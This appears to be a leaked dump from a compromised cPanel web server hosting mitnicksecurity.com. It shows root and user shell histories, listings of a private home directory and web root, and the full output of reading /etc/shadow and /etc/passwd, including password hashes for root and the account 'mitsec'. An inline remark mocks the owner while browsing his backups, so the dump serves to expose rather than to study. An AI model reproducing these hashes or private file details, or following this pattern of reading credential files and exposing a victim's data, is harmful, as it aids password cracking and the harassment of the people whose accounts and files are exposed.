/etc/ssh/sshd_config vi /etc/apf/conf.apf vi /etc/apf/conf.apf /sbin/service sshd restart /etc/apf/apf -r cd /root vi /usr/local/lib/php.ini vi /usr/local/php4/lib/php.ini /scripts/restartsrv httpd vi /etc/apf/conf.apf apf -r /sbin/service pure-ftpd stop mv /etc/rc.d/init.d/pure-ftpd /root/ echo > /etc/rc.d/init.d/pure-ftpd chattr +i /etc/rc.d/init.d/pure-ftpd vi /etc/pam.d/crond service crond restart passwd mitsec cd /var/log/ ls tail secure w w pico /etc/httpd/conf/httpd.conf whereis php.ini pico /usr/lib/php.ini service httpd restart pico /etc/httpd/conf/httpd.conf pico /usr/local/apache/conf/php.conf cd /etc/httpd/conf/ ls pico php.conf php -i | grep php.ini pico /usr/local/lib/php.ini /scripts/installgd tail -f /etc/httpd/logs/error_log service httpd restart tail -f /etc/httpd/logs/error_log /scripts/easyapache cd /home/mitsec/ cd www pico info.txt chown mitsec:mitsec info.txt psaswd mitsec psaswd mitsec passwd mitsec whereis proftpd la ls ls -l pico index.php cd /var/log cat secure ls pico rootlogins ls pico apf_log service apf stop service apf start pico apf_log date pico /etc/apf/conf.apf service apf restart pico apf_log ls tail secure w tail secure lastlog cd /home/mitsec/ ls cd www ls cd .. ls pico .bash_history ls cd / ls w betstat netstat w ls -l df -h w netstat netstat netstat cd /etc/httpd/logs/ ls tail -f access_log tail -f error_log pico /var/log/secure grep "510" /etc/shadow grep "510" /etc/passwd pico /var/log/secure w w cd /var/log/ grep "65.124.165" * cd /etc/httpd ls cd domlogs/ ls grep "65.124.165" mitnicksecurity.com pico mitnicksecurity.com cd mitsec ls pico mitnicksecurity.com cd /home/mitsec/access-logs/ ls pico mitnicksecurity.com w top vi /usr/local/apache/conf/httpd.conf vi /usr/local/apache/conf/httpd.conf cd /usr/local/apache du -sh prm /scripts/restartsrv httpd top top w history pico /etc/apf/conf.apf service apf restart ping 4.2.2.1 telnet vpn.isopoly.com 25 w telnet vpn.isopoly.com 25 w top w lastlog history exit w lastlog rkhunter -c w chkrootkit ps -aux cd /var/tmp/ ls -l cd /tmp ls -l rm -Rf r* cd /usr/local/apache; ls -l pr w top rkhunter -c w vi /usr/local/sim/conf.sim vi /usr/local/sim/conf.sim cp -p /etc/ssh/sshd_config /etc/ssh/sshd_config.325 vi /etc/ssh/sshd_config vi /etc/apf/conf.apf /sbin/service sshd restart /sbin/service apf restart w ifconfig cd /var/log/ tail secure pico secure w w tail secure tail secure tail secure tail secure tail secure cd /etc/ssh dir vi sshd_config w cd /home/ ls cd no ls cd .. ls cd /var/log/ tail secure tail -n 100 secure cd /tmp ls cd /var/log/btmp pico /var/log/btmp cd /var/log ls -l btmp pico /etc/passwd rkhunter rkhunter -c tail /var/cpanel/accounting.log tail /var/cpanel/root.accts df -h top history cd /home/mitsec/ ls -l cat .lastlogin ls cd www ls ls -l |grep "Jul" ls -l cd .. ls cd .. ls ls -l df -h cd /home/ ls ls -l cd mitsec/ ls ls -l cd /home/ ls cd / ls ls -l df -h rm -Rf 3-21-mitsec-os-image.tgz df -h cd /etc ls ls -l top w tail /var/log/secure tail /var/log/messages netstat exit w df -h cd /home/ ls cd no ls ls -l cd .. ls cd mitsec/ ls ls -l cd public_ cd public_html/ ls ls -l ls -l contact_form.php pico contact_form.php df -h top w ls -l cd / ls cd .. ls -l cd / ls ls -l w df -h top w cd / ls cd tmp ls cd backupfileehwcb2/ ls ls -l cd .. ls cd / ls ls -l rm tmp.tar ls -l df -h cd /home ls cd cpbackuptmp/ ls cd cpbackup/ <-- I *wonder* what's in his CP dir ls ls -l cd daily/ ls cd .. cd weekly/ ls ls -l cd .. ls cd monthly/ ls cd .. cd weekly/ ls -l cd .. ls cd .. ls cd .. ls cd no ls cd sources/ ls cd modules/ ls ls -l cd .. ls cd authors/ ls ls -l cd .. ls ls -l pico MIRRORED.BY cd .. ls ls -l cd .. ls cd virtfs/ ls ls -l cd mitsec/ ls ls -l cd home ls ls -l cd mitsec/ ls cd .. cd .. cd .. ls cd .. ls cd / ls w top root at dc21 [~]# w 10:53:46 up 3 days, 12:38, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root at dc21 [~]# cat /etc/shadow /etc/passwd root:$1$5K/cgjHy$YY0B5o9EuLytWnXPBP7eU0:14430:0:99999:7::: bin:*:13649:0:99999:7::: daemon:*:13649:0:99999:7::: adm:*:13649:0:99999:7::: lp:*:13649:0:99999:7::: sync:*:13649:0:99999:7::: shutdown:*:13649:0:99999:7::: halt:*:13649:0:99999:7::: mail:*:13649:0:99999:7::: news:*:13649:0:99999:7::: uucp:*:13649:0:99999:7::: operator:*:13649:0:99999:7::: games:*:13649:0:99999:7::: gopher:*:13649:0:99999:7::: ftp:*:13649:0:99999:7::: nobody:*:13649:0:99999:7::: vcsa:!!:13649:0:99999:7::: dbus:!!:13649:0:99999:7::: mailnull:!!:13649:0:99999:7::: smmsp:!!:13649:0:99999:7::: apache:!!:13649:0:99999:7::: sshd:!!:13649:0:99999:7::: rpc:!!:13649:0:99999:7::: pcap:!!:13649:0:99999:7::: rpm:!!:13649:0:99999:7::: named:!!:13649:0:99999:7::: cpanel:*:14324:::::: postfix:!!:14324:::::: xfs:!!:14324:::::: mysql:!!:14324:::::: mailman:*:14324:::::: cpanelhorde:*:14324:::::: cpanelphpmyadmin:*:14324:::::: cpanelphppgadmin:*:14324:::::: cpanelroundcube:*:14324:::::: mitsec:$1$VVB/aSDv$cFi4QkgSPku7Gsc0nR.gz/:14327:0:99999:7::: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpm:x:37:37::/var/lib/rpm:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin cpanel:x:32001:32001::/usr/local/cpanel:/bin/false postfix:x:89:89::/var/spool/postfix:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash mailman:x:32002:32002::/usr/local/cpanel/3rdparty/mailman:/bin/false cpanelhorde:x:32003:32005::/var/cpanel/userhomes/cpanelhorde:/usr/local/cpanel/ bin/noshell cpanelphpmyadmin:x:32004:32006::/var/cpanel/userhomes/cpanelphpmyadmin:/usr/loc al/cpanel/bin/noshell cpanelphppgadmin:x:32005:32007::/var/cpanel/userhomes/cpanelphppgadmin:/usr/loc al/cpanel/bin/noshell cpanelroundcube:x:32006:32008::/var/cpanel/userhomes/cpanelroundcube:/usr/local /cpanel/bin/noshell mitsec:x:510:510::/home/mitsec:/usr/local/cpanel/bin/jailshell root at dc21 [~]# cd /home/mitsec/ root at dc21 [~]# ls -la total 10085472 drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 . drwxr-xr-x 12 root root 4096 Jul 16 10:36 .. -rwxr-xr-x 1 mitsec mitsec 64 Mar 20 2007 .Xauthority -rwxr-xr-x 1 mitsec mitsec 2399 Jul 9 10:01 .bash_history -rwxr-xr-x 1 mitsec mitsec 24 Feb 25 2006 .bash_logout -rwxr-xr-x 1 mitsec mitsec 191 Feb 25 2006 .bash_profile -rwxr-xr-x 1 mitsec mitsec 124 Feb 25 2006 .bashrc -rwxr-xr-x 1 mitsec mitsec 5619 Aug 21 2006 .canna -rwxr-xr-x 1 mitsec mitsec 17 Jan 30 2006 .contactemail -rwxr-xr-x 1 mitsec mitsec 10 Jan 30 2006 .contactsavetime drwxr-xr-x 5 mitsec mitsec 4096 Mar 21 12:58 .cpanel -rwxr-xr-x 1 mitsec mitsec 1682 Jan 23 2005 .cpanel-ducache -rwxr-xr-x 1 mitsec mitsec 19 Jul 17 10:46 .dns -rwxr-xr-x 1 mitsec mitsec 383 Aug 21 2006 .emacs drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 .fantasticodata -rwxr-xr-x 1 mitsec mitsec 16 Jul 2 23:11 .ftpquota drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .gnupg drwxr-xr-x 52 mitsec nobody 4096 Sep 1 2008 .htpasswds -rwxr-xr-x 1 mitsec mitsec 7 Sep 2 2008 .lang -rw------- 1 mitsec mitsec 14 Jul 16 10:22 .lastlogin -rwxr-xr-x 1 mitsec mitsec 35 Jan 13 2009 .lesshst -rwxr-xr-x 1 mitsec mitsec 6441532 May 6 2006 .pureftpd-upload.445d6ea6.15.1358.7997c79e drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .sqmaildata drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .ssh drwxr-xr-x 2 mitsec mitsec 4096 Mar 28 2007 .trash -rwxr-xr-x 1 mitsec mitsec 705 Feb 28 2008 .viminfo -rwxr-xr-x 1 mitsec mitsec 5 Mar 5 2006 .whmtheme -rwxr-xr-x 1 mitsec mitsec 658 Aug 21 2006 .zshrc -rwxr-xr-x 1 mitsec mitsec 1361309 Mar 7 2008 CDMA WORKSHOP.rar -rwxr-xr-x 1 mitsec mitsec 73025457 Mar 20 2007 MitnickDemo.wmv -rwxr-xr-x 1 mitsec mitsec 20152320 Mar 7 2008 SOFTWARE PACK.rar -rwxr-xr-x 1 mitsec mitsec 49569 Mar 7 2008 UNIBOX.rar lrwxrwxrwx 1 mitsec mitsec 32 Jul 7 19:34 access-logs -> /usr/local/apache/domlogs/mitsec -rwxr-xr-x 1 mitsec mitsec 582461440 Aug 7 2007 archive.tar -rwxr-xr-x 1 mitsec mitsec 607360 Sep 4 2007 arcot.ppt -rwxr-xr-x 1 mitsec mitsec 30242339 Jul 25 2007 asterisk-1.0.8-backup-2007-07-25.tar.gz -rwxr-xr-x 1 mitsec mitsec 2189910925 Oct 25 2007 backup-10.25.2007_23-54-41_mitsec.tar.gz -rw------- 1 mitsec mitsec 3264566004 Jul 16 10:35 backup-7.16.2009_10-22-58_mitsec.tar.gz -rw------- 1 mitsec mitsec 3264029970 Jul 8 16:51 backup-7.8.2009_16-39-47_mitsec.tar.gz -rwxr-xr-x 1 mitsec mitsec 617186883 Aug 19 2007 backup-8.19.2007.tar.gz -rwxr-xr-x 1 mitsec mitsec 90279 Nov 6 2006 badboys.mp3 -rwxr-xr-x 1 mitsec mitsec 211 May 5 2007 boot.ini -rwxr-xr-x 1 mitsec mitsec 5305344 Feb 7 2007 circosec-FINAL.ppt -rwxr-xr-x 1 mitsec mitsec 5299200 Jan 8 2007 circosec.ppt -rwxr-xr-x 1 mitsec mitsec 99001 Nov 21 2007 clid.tar.gz -rwxr-xr-x 1 mitsec mitsec 50838 Jun 20 03:10 contact_form.php drwxr-xr-x 4 mitsec mitsec 4096 Sep 1 2008 cpanel3-skel -rwxr-xr-x 1 mitsec mitsec 1 Jan 20 22:01 cpbackup-exclude.conf drwxr-xr-x 2 mitsec mitsec 4096 Mar 18 00:19 cpmove.psql drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 cpmove.psql.1220367507 drwxr-xr-x 3 mitsec mitsec 4096 Sep 2 2008 cpmove.psql.1237665475 -rwxr-xr-x 1 mitsec mitsec 238515 Aug 19 2007 error_log -rwxr-xr-x 1 mitsec mitsec 72854668 Aug 3 2008 error_log.txt drwxr-x--- 14 mitsec mail 4096 Oct 23 2008 etc -rwxr-xr-x 1 mitsec mitsec 33449 Nov 24 2007 etcasterisk.tar.gz -rwxr-xr-x 1 mitsec mitsec 74625550 Oct 20 2007 files.zip -rwxr-xr-x 1 mitsec mitsec 17912486 Apr 18 2007 for-faa.zip -rwxr-xr-x 1 mitsec mitsec 35938 Apr 6 2007 httpd.conf -rwxr-xr-x 1 mitsec mitsec 35186 Apr 6 2007 httpd.conf.rpmnew -rwxr-xr-x 1 mitsec mitsec 1515582 Nov 12 2006 issa.jpg -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk.ppt -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk1.ppt -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk2.ppt drwxr-xr-x 2 mitsec mitsec 4096 Aug 13 2007 logs drwxrwx--- 10 mitsec mitsec 4096 Mar 21 14:35 mail -rwxr-xr-x 1 mitsec mitsec 38559604 Apr 25 2005 mitnickpromo2.mov -rwxr-xr-x 1 mitsec mitsec 18084536 Apr 18 2007 mitnickpromo2.wmv -rwxr-xr-x 1 mitsec mitsec 600292 Aug 7 2007 mitsec_mitsecmscontact.csv.zip -rwxr-xr-x 1 mitsec mitsec 616494 Aug 7 2007 mitsec_mitsecmscontact.sql.zip -rwxr-xr-x 1 mitsec mitsec 693914 Aug 7 2007 mitsec_mitsecmscontact.xls.zip -rwxr-xr-x 1 mitsec mitsec 1506 Apr 4 2007 mod_security.conf drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 moved -rwxr-xr-x 1 mitsec mitsec 9457 Nov 18 2006 presentations.php drwxr-xr-x 3 mitsec mitsec 4096 Mar 21 14:34 public_ftp drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 public_html -rwxr-xr-x 1 mitsec mitsec 11274 Apr 4 2007 ssl.conf drwxr-xr-x 2 mitsec mitsec 4096 Jan 30 2008 stuff drwxr-xr-x 7 mitsec mitsec 4096 Oct 10 2008 tmp -rwxr-xr-x 1 mitsec mitsec 30189757 Nov 24 2007 varlib.tar.gz -rwxr-xr-x 1 mitsec mitsec 66023 Jun 19 21:23 websitephp.tar.gz lrwxrwxrwx 1 mitsec mitsec 11 Jul 7 19:18 www -> public_html drwxr-xr-x 2 mitsec mitsec 4096 Nov 12 2006 zzhp -rwxr-xr-x 1 mitsec mitsec 61314 Jun 19 22:03 zzhp.tar.gz root at dc21 [~]# cat .bash_history exit ps aux ps aux users who cd ../ ls cd ../ ls cd bin ls cd ../ ls ls cd home ls cd ../ cd etc ls last vi host.conf ls vi shadow vi passwd cd /usr cd local cd pcanel cd cpanel ls cd bin ls ./rkhunter cd ../ ls cd ../../ cd ../ ls cd home ls cd mitsec/ ls vi error_log cat error_log ls -la vi .bash_history vi .bash_history vi httpd.conf vi .contactemail vi .dns cd logs ls cd ../ ls vi mod_security.conf cd access-logs last cd /var/log ls vi messages vi wtmp cd ../ cd ../ last -a last -a psaux psaux p[s aux; exit; q ps aux ps aux cd /scripts ls ./checkvirtfs vi checkvirtfs cd opt ls cd ../ cd var ls cd ../ ls last last -a netstat -an netstat netstat -an tcp 0 6224 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145 ESTABLISHED netstat -an | grep -i estab mitsec at mitnicksecurity.com [/]# netstat -an | grep -i estab Active Internet connections (servers and established) tcp 0 177 69.65.59.78:25 88.102.181.144:2320 ESTABLISHED tcp 0 0 69.65.59.78:80 124.125.89.117:55412 ESTABLISHED tcp 0 0 69.65.59.78:80 124.125.89.117:55413 ESTABLISHED tcp 0 0 69.65.59.78:80 124.125.89.117:55153 ESTABLISHED tcp 0 0 69.65.59.78:80 124.125.89.117:55416 ESTABLISHED tcp 0 0 69.65.59.78:58434 65.254.36.154:21 ESTABLISHED tcp 0 51840 69.65.59.78:38345 65.254.36.154:49565 ESTABLISHED tcp 0 52 ::ffff:69.65.59.78:3442 ::ffff:67.169.204.62:33145 ESTABLISHED Active UNIX domain sockets (servers and established) mitsec at mitnicksecurity.com [/]# netstat -an | grep 67.169.204.62 netstat -an 98.99.158.166tcp 0 0 ::ffff:69.65.59.78:3442 ::ffff:98.99.158.166:64118 ESTABLISHED netstat -an users who netstat -an netstat -an | grep .248 netstat -an netstat -an | gep 67.214.58.248 netstat -an | grep 67.214.58.248 netstat netstat | grep 67.214.58.248 netstat -an last last -a netstat | grep 216.245.214.108 last exit cd public_html/ ls -tal | more exit ls cd mail ls -lta ls new cd new cat * cd .. ls ls -lta ls -l cur ls -l mitnicksecurity.com/ ls -latR | more ls cd mitnicksecurity.com/ cd kmitnick/ ls ls cur cd new ls more * cd .. cd .. cd .. ls w last mitsec exit ls cd www/ ls ls c* cd ls cd public_ cd public_html/ ls vi contact_form.php exitroot at dc21 [~]# ls -al total 10085472 drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 . drwxr-xr-x 12 root root 4096 Jul 16 10:36 .. -rwxr-xr-x 1 mitsec mitsec 64 Mar 20 2007 .Xauthority -rwxr-xr-x 1 mitsec mitsec 2399 Jul 9 10:01 .bash_history -rwxr-xr-x 1 mitsec mitsec 24 Feb 25 2006 .bash_logout -rwxr-xr-x 1 mitsec mitsec 191 Feb 25 2006 .bash_profile -rwxr-xr-x 1 mitsec mitsec 124 Feb 25 2006 .bashrc -rwxr-xr-x 1 mitsec mitsec 5619 Aug 21 2006 .canna -rwxr-xr-x 1 mitsec mitsec 17 Jan 30 2006 .contactemail -rwxr-xr-x 1 mitsec mitsec 10 Jan 30 2006 .contactsavetime drwxr-xr-x 5 mitsec mitsec 4096 Mar 21 12:58 .cpanel -rwxr-xr-x 1 mitsec mitsec 1682 Jan 23 2005 .cpanel-ducache -rwxr-xr-x 1 mitsec mitsec 19 Jul 17 10:46 .dns -rwxr-xr-x 1 mitsec mitsec 383 Aug 21 2006 .emacs drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 .fantasticodata -rwxr-xr-x 1 mitsec mitsec 16 Jul 2 23:11 .ftpquota drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .gnupg drwxr-xr-x 52 mitsec nobody 4096 Sep 1 2008 .htpasswds -rwxr-xr-x 1 mitsec mitsec 7 Sep 2 2008 .lang -rw------- 1 mitsec mitsec 14 Jul 16 10:22 .lastlogin -rwxr-xr-x 1 mitsec mitsec 35 Jan 13 2009 .lesshst -rwxr-xr-x 1 mitsec mitsec 6441532 May 6 2006 .pureftpd-upload.445d6ea6.15.1358.7997c79e drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .sqmaildata drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 .ssh drwxr-xr-x 2 mitsec mitsec 4096 Mar 28 2007 .trash -rwxr-xr-x 1 mitsec mitsec 705 Feb 28 2008 .viminfo -rwxr-xr-x 1 mitsec mitsec 5 Mar 5 2006 .whmtheme -rwxr-xr-x 1 mitsec mitsec 658 Aug 21 2006 .zshrc -rwxr-xr-x 1 mitsec mitsec 1361309 Mar 7 2008 CDMA WORKSHOP.rar -rwxr-xr-x 1 mitsec mitsec 73025457 Mar 20 2007 MitnickDemo.wmv -rwxr-xr-x 1 mitsec mitsec 20152320 Mar 7 2008 SOFTWARE PACK.rar -rwxr-xr-x 1 mitsec mitsec 49569 Mar 7 2008 UNIBOX.rar lrwxrwxrwx 1 mitsec mitsec 32 Jul 7 19:34 access-logs -> /usr/local/apache/domlogs/mitsec -rwxr-xr-x 1 mitsec mitsec 582461440 Aug 7 2007 archive.tar -rwxr-xr-x 1 mitsec mitsec 607360 Sep 4 2007 arcot.ppt -rwxr-xr-x 1 mitsec mitsec 30242339 Jul 25 2007 asterisk-1.0.8-backup-2007-07-25.tar.gz -rwxr-xr-x 1 mitsec mitsec 2189910925 Oct 25 2007 backup-10.25.2007_23-54-41_mitsec.tar.gz -rw------- 1 mitsec mitsec 3264566004 Jul 16 10:35 backup-7.16.2009_10-22-58_mitsec.tar.gz -rw------- 1 mitsec mitsec 3264029970 Jul 8 16:51 backup-7.8.2009_16-39-47_mitsec.tar.gz -rwxr-xr-x 1 mitsec mitsec 617186883 Aug 19 2007 backup-8.19.2007.tar.gz -rwxr-xr-x 1 mitsec mitsec 90279 Nov 6 2006 badboys.mp3 -rwxr-xr-x 1 mitsec mitsec 211 May 5 2007 boot.ini -rwxr-xr-x 1 mitsec mitsec 5305344 Feb 7 2007 circosec-FINAL.ppt -rwxr-xr-x 1 mitsec mitsec 5299200 Jan 8 2007 circosec.ppt -rwxr-xr-x 1 mitsec mitsec 99001 Nov 21 2007 clid.tar.gz -rwxr-xr-x 1 mitsec mitsec 50838 Jun 20 03:10 contact_form.php drwxr-xr-x 4 mitsec mitsec 4096 Sep 1 2008 cpanel3-skel -rwxr-xr-x 1 mitsec mitsec 1 Jan 20 22:01 cpbackup-exclude.conf drwxr-xr-x 2 mitsec mitsec 4096 Mar 18 00:19 cpmove.psql drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 cpmove.psql.1220367507 drwxr-xr-x 3 mitsec mitsec 4096 Sep 2 2008 cpmove.psql.1237665475 -rwxr-xr-x 1 mitsec mitsec 238515 Aug 19 2007 error_log -rwxr-xr-x 1 mitsec mitsec 72854668 Aug 3 2008 error_log.txt drwxr-x--- 14 mitsec mail 4096 Oct 23 2008 etc -rwxr-xr-x 1 mitsec mitsec 33449 Nov 24 2007 etcasterisk.tar.gz -rwxr-xr-x 1 mitsec mitsec 74625550 Oct 20 2007 files.zip -rwxr-xr-x 1 mitsec mitsec 17912486 Apr 18 2007 for-faa.zip -rwxr-xr-x 1 mitsec mitsec 35938 Apr 6 2007 httpd.conf -rwxr-xr-x 1 mitsec mitsec 35186 Apr 6 2007 httpd.conf.rpmnew -rwxr-xr-x 1 mitsec mitsec 1515582 Nov 12 2006 issa.jpg -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk.ppt -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk1.ppt -rwxr-xr-x 1 mitsec mitsec 0 Aug 29 2006 landesk2.ppt drwxr-xr-x 2 mitsec mitsec 4096 Aug 13 2007 logs drwxrwx--- 10 mitsec mitsec 4096 Mar 21 14:35 mail -rwxr-xr-x 1 mitsec mitsec 38559604 Apr 25 2005 mitnickpromo2.mov -rwxr-xr-x 1 mitsec mitsec 18084536 Apr 18 2007 mitnickpromo2.wmv -rwxr-xr-x 1 mitsec mitsec 600292 Aug 7 2007 mitsec_mitsecmscontact.csv.zip -rwxr-xr-x 1 mitsec mitsec 616494 Aug 7 2007 mitsec_mitsecmscontact.sql.zip -rwxr-xr-x 1 mitsec mitsec 693914 Aug 7 2007 mitsec_mitsecmscontact.xls.zip -rwxr-xr-x 1 mitsec mitsec 1506 Apr 4 2007 mod_security.conf drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 moved -rwxr-xr-x 1 mitsec mitsec 9457 Nov 18 2006 presentations.php drwxr-xr-x 3 mitsec mitsec 4096 Mar 21 14:34 public_ftp drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 public_html -rwxr-xr-x 1 mitsec mitsec 11274 Apr 4 2007 ssl.conf drwxr-xr-x 2 mitsec mitsec 4096 Jan 30 2008 stuff drwxr-xr-x 7 mitsec mitsec 4096 Oct 10 2008 tmp -rwxr-xr-x 1 mitsec mitsec 30189757 Nov 24 2007 varlib.tar.gz -rwxr-xr-x 1 mitsec mitsec 66023 Jun 19 21:23 websitephp.tar.gz lrwxrwxrwx 1 mitsec mitsec 11 Jul 7 19:18 www -> public_html drwxr-xr-x 2 mitsec mitsec 4096 Nov 12 2006 zzhp -rwxr-xr-x 1 mitsec mitsec 61314 Jun 19 22:03 zzhp.tar.gz root at dc21 [~]# cd www/; ls -la total 82928 drwxr-xr-x 24 mitsec nobody 4096 Jul 9 10:01 . drwxr-xr-x 22 mitsec mitsec 4096 Jul 16 10:36 .. -rwxr-xr-x 1 mitsec mitsec 629 Feb 26 14:36 .htaccess -rwxr-xr-x 1 mitsec mitsec 729350 Aug 7 2007 CSC-Testimonial.pdf -rwxr-xr-x 1 mitsec mitsec 1194067 May 12 2008 FBI_Pretexts_and_Cover_Techniques_May-1956.pdf -rwxr-xr-x 1 mitsec mitsec 2547699 Aug 7 2007 Mitnick_Playboy_feature.pdf -rwxr-xr-x 1 mitsec mitsec 687114 Nov 15 2008 PsychologyToday1208.pdf -rwxr-xr-x 1 mitsec mitsec 117138 Mar 1 2008 US-pretrial.pdf -rwxr-xr-x 1 mitsec mitsec 1038 Oct 20 2007 _contact_settings.php -rwxr-xr-x 1 mitsec mitsec 528 Jan 18 16:26 _footer.php -rwxr-xr-x 1 mitsec mitsec 3133 Aug 7 2007 _header.php -rwxr-xr-x 1 mitsec mitsec 1380 Mar 28 2005 _news_frontpage.php -rwxr-xr-x 1 mitsec mitsec 18277 Jun 28 15:20 _sidebar.php drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 alexkasper drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 amc -rwxr-xr-x 1 mitsec mitsec 37314215 Oct 20 2007 amc.zip -rwxr-xr-x 1 mitsec mitsec 2798 Aug 7 2007 aoi_reviews.php drwxr-xr-x 2 mitsec mitsec 4096 Oct 24 2008 blittle drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cgi-bin drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 cialdini drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 circosec drwxr-xr-x 2 mitsec mitsec 4096 May 15 01:46 clid -rwxr-xr-x 1 mitsec mitsec 2870 Aug 7 2007 company.php -rwxr-xr-x 1 mitsec mitsec 2462 Jan 13 2006 config.php drwxr-xr-x 4 mitsec mitsec 4096 Sep 1 2008 contact-admin -rwxr-xr-x 1 mitsec mitsec 2216 Aug 7 2007 contact-old.php -rwxr-xr-x 1 mitsec mitsec 2174 Mar 19 2007 contact-saved.php -rwxr-xr-x 1 mitsec mitsec 1662 Aug 26 2007 contact.php -rwxr-xr-x 1 mitsec mitsec 22744 Nov 16 2006 contact.php.bk -rwxr-xr-x 1 mitsec mitsec 22519 Nov 13 2006 contact.php.save -rwxr-xr-x 1 mitsec mitsec 1054 Aug 7 2007 contact_confirmation.php -rwxr-xr-x 1 mitsec mitsec 50576 Jun 20 03:17 contact_form.matt -rwxr-xr-x 1 mitsec mitsec 50245 Jun 9 15:45 contact_form.oldform -rwxr-xr-x 1 mitsec mitsec 50806 Jul 9 09:53 contact_form.php -rwxr-xr-x 1 mitsec mitsec 1988 Dec 7 2006 contact_new.php.bk -rwxr-xr-x 1 mitsec mitsec 8021 Nov 16 2006 contact_submit.php.bk drwxr-xr-x 3 mitsec mitsec 4096 Feb 26 14:36 defthi drwxr-xr-x 5 mitsec mitsec 4096 Sep 1 2008 dev drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 elsag -rwxr-xr-x 1 mitsec mitsec 1613 Jan 13 2006 error.gif -rwxr-xr-x 1 mitsec mitsec 384144 Aug 7 2007 faa.pdf -rwxr-xr-x 1 mitsec mitsec 3897 Mar 28 2005 feeds.php drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 flash -rwxr-xr-x 1 mitsec mitsec 4859 Aug 22 2006 generateimage.php -rwxr-xr-x 1 mitsec mitsec 23 Nov 20 2006 googlehostedservice.html drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 guillermo drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 images -rwxr-xr-x 1 mitsec mitsec 12083 Mar 5 2007 index-save.php -rwxr-xr-x 1 mitsec mitsec 5394 May 18 17:28 index.php -rwxr-xr-x 1 mitsec mitsec 12077 Nov 26 2006 index.php.save -rwxr-xr-x 1 mitsec mitsec 385 Mar 21 17:59 info.txt -rwxr-xr-x 1 mitsec mitsec 1440 Aug 7 2007 investigations.php -rwxr-xr-x 1 mitsec mitsec 1515582 Aug 7 2007 issa.jpg drwxr-xr-x 3 mitsec mitsec 4096 Jun 20 03:16 jon drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 keppler -rwxr-xr-x 1 mitsec mitsec 8793 Aug 7 2007 lastRSS.php drwxr-xr-x 2 mitsec mitsec 4096 Jan 20 16:51 media drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 mitnick -rwxr-xr-x 1 mitsec mitsec 38559604 Aug 20 2006 mitnickpromo2.mov -rwxr-xr-x 1 mitsec mitsec 5089 Jan 13 2006 msc.css drwxr-xr-x 3 mitsec mitsec 4096 Sep 1 2008 news drwxr-xr-x 2 mitsec mitsec 4096 Sep 1 2008 patrickau -rwxr-xr-x 1 mitsec mitsec 1088600 Oct 27 2008 pdi-testimonial.pdf -rwxr-xr-x 1 mitsec mitsec 7120 Aug 7 2007 presentations.php -rwxr-xr-x 1 mitsec mitsec 9188 Jun 28 15:21 press.php -rwxr-xr-x 1 mitsec mitsec 3487 Mar 28 2005 privacy.php -rwxr-xr-x 1 mitsec mitsec 3111 Aug 7 2007 products.php -rwxr-xr-x 1 mitsec mitsec 1200 Aug 13 2007 resources.php -rwxr-xr-x 1 mitsec mitsec 8172 Aug 7 2007 services.php -rwxr-xr-x 1 mitsec mitsec 5218 Aug 13 2007 speaking.php -rwxr-xr-x 1 mitsec mitsec 4975 Sep 29 2006 speakingold.php 